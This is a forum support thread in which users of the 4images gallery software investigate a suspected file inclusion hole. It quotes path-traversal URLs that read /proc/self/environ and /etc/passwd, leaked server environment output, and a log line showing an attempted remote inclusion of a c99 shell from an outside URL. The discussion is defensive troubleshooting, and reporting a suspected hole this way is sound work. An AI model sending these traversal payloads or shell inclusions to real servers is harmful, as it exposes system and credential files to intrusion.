[Secutity] Security hole testing...please read

[MadSci]

This was executed remotely:

/index.php?template=../../../../../../proc/self/environ%00

it lists some info about the server hosting the database

ms

[thunderstrike]

What is web error log say ?

[MadSci]

PHP Warning:  main() [<a href='function.include'>function.include</a>]: Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/usr/local/lib/php/PEAR') in htp://speakerformula.com/forum/c99.txt? on line 1

c99 is shell crap

ms

ps do not click the link it has a virus

[thunderstrike]

Is come from PHP PEAR script ... you no use PHP PEAR for programming ? If no ... report this to host if link is virus.

[MadSci]

try this

www.yourdomainname.com/4images/index.php?template=../../../../../../proc/self/environ%00

it will list some environ vars

ms

[thunderstrike]

Hum ... I no can reproduce ... you install MOD ?

[MadSci]

realy I have 1.7.4 installed fresh no issues so far..and I dont see any C99 shell scripts or unusual files...here is what I get:

PATH=/usr/local/bin:/usr/bin:/bin�DOCUMENT_ROOT=/home/usr/public_html
�HTTP_ACCEPT=text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
�HTTP_ACCEPT_CHARSET=windows-1252,utf-8;q=0.7,*;q=0.7
�HTTP_ACCEPT_ENCODING=gzip,deflate
�HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5
�HTTP_CONNECTION=keep-alive
�HTTP_COOKIE=4images_lastvisit=1194399643; 4images_userid=-1; sessionid=bf0ab967af825fe368edf0d; PHPSESSID=73bde90b5fbe06062efec8
�HTTP_HOST=www.blahblah.com
�HTTP_KEEP_ALIVE=300
�HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9
�REMOTE_ADDR=my ip�REMOTE_PORT=2258�SCRIPT_FILENAME=/home/usr/public_html/db/index.php
�SERVER_ADDR=67.15.�SERVER_ADMIN=webmaster@4images.com�SERVER_NAME=www.blah.com
�SERVER_PORT=80�SERVER_SOFTWARE=Apache�GATEWAY_INTERFACE=CGI/1.1�SERVER_PROTOCOL=HTTP/1.1�REQUEST_METHOD=GET
�QUERY_STRING=template=../../../../../../proc/self/environ%00�REQUEST_URI=/db/index.php?template=../../../../../../proc/self/environ%00�SCRIPT_NAME=/db/index.php

some info was changed to preserve security

[kai]

Hi MadSci,

I can't reproduce it.
Please check PN.

thanks,
Kai

[MadSci]

did u get the same thing ?

whats the verdict guys..how serious is it ?

ms

[kai]

No problem here:
http://demo.4homepages.de/index.php?template=../../../../../../proc/self/environ%00


Which modifications do you have installed?

[MadSci]

What I did is:

1. installed seccond copy of 4images 1.7.4 on my server.
2. from the old 4images I copy the skin and the media folder
3. I logged in the new 4images and just restored the database and the skin..
no additional MODs installed...or anything...

for the past 2 months Ive seen increased attempts to run C99 shell scripts. The most hits are coming from veloxzone.com.br site..they always try :

index.php?template=site which has c99 shel or other trojan..
it never worked this is the only one which manage to run environ command which is unuasual..the hit came from south africa I guess proxy.

ms

[kai]

Perhaps it's a wrong configured webserver.

[thunderstrike]

Is come from PHP PEAR script ... you no use PHP PEAR for programming ? If no ... report this to host if link is virus.

I say here ... report to host for question.

[MadSci]

Hey Guys,
could you please execute this links on your server and report  if anything unusual:

Code: [Select]

http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/passwd%00

http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/group%00

http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/hosts%00

http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/services%00

http://www.yourdomain.com/4images_dir/index.php?template=/../../../../../../../etc/syslog.conf%00

replace: yourdomain.com and the 4images_dir with your own domain name and directory



This links were security hole for my site which was disabled by the host until we figure this out. Unfortunately so far this is the first report of such activity so before we label it as hole we need to see if somebody else have the same problem. If not then I will reinstall and rebuild my site from scratch...

thanx I really appreciate the help

ms

[Nicky]

no effect
not on my server http://www.nicky.net/4test/
not on http://demo.4homepages.de/ server